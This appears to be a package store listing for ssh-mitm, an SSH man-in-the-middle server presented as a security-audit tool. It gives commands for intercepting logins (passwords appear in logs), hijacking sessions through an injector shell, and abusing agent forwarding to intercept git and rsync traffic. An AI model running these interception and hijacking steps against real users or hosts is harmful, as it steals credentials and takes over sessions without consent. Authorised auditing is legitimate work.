ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation
Connect to the network
To start an intercepting mitm-ssh server on Port 10022, all you have to do is run a single command.
$ ssh-mitm --remote-host 192.168.0.x
Now let's try to connect to the ssh-mitm server.
$ ssh -p 10022 user@proxyserver
You will see the credentials in the log output.
2021-01-01 11:38:26,098 [INFO] Client connection established with parameters: Remote Address: 192.168.0.x Port: 22 Username: user Password: supersecret Key: None Agent: None
Hijack SSH sessions
When a client connects, the ssh-mitm starts a new server, which is used for session hijacking.
[INFO] created injector shell on port 34463
To hijack this session, you can use your favorite ssh client. All you have to do is to connect to the hijacked session.
$ ssh -p 34463 127.0.0.1
SSH-MITM proxy server is capable of advanced man in the middle attacks and can be used in scenarios, where the remote host is not known or a single remote host is not sufficient or public key authentication is usded.
Public key authentication
Public key authentication is a way of logging into an SSH/SFTP account using a cryptographic key rather than a password.
The advantage is, that no confidential data needs to be sent to the remote host which can be intercepted by a man in the middle attack.
Due to this design concept, SSH-MITM proxy server is not able to reuse the data provided during authentication.
It you need to intercept a client with public key authentication, there are some options.
SSH supports agent forwarding, which allows a remote host to authenticate against another remote host.
SSH-MITM proxy server is able to request the agent from the client and use it for remote authentication. By using this feature, a SSH-MITM proxy server is able to do a full man in the middle attack.
Using agent forwarding, SSH-MITM proxy server must be started with --request-agent.
$ ssh-mitm --request-agent --remote-host 192.168.0.x
The client must be started with agent forwarding enabled.
$ ssh -A -p 10022 user@proxyserver
In most cased, when git is used over ssh, public key authentication is used. The default git command does not have a forward agent parameter.
To enable agent forwarding, git has to be executed with the ``GIT_SSH_COMMAND`` environment variable.
# start the ssh server ssh-mitm --remote-host github.com --request-agent --scp-interface debug_traffic # invoke git commands GIT_SSH_COMMAND="ssh -A" git clone ssh://firstname.lastname@example.org:10022/ssh-mitm/ssh-mitm.git
When ssh-mitm is used to intercept rsync, the port must be provided as a parameter to rsync. Also the agent can be forwarded, if needed.
To sync a local directory with a remote directory, rsync can be executed with following parameters.
rsync -r -e 'ssh -p 10022 -A' /local/folder/ email@example.com:/remote/folder/
SSH-MITM has some client exploits integrated, which can be used to audit various ssh clients like OpenSSH and PuTTY.
Full Documentation: https://docs.ssh-mitm.at
Generate an embeddable card to be shared on external websites.
Choose your Linux distribution to get detailed installation instructions. If yours is not shown, get more details on the installing snapd documentation.
Is there a problem with ssh-mitm? Report this app
Thanks for bringing this to our attention. Information you provided will help us investigate further.
There was an error while sending your report. Please try again later.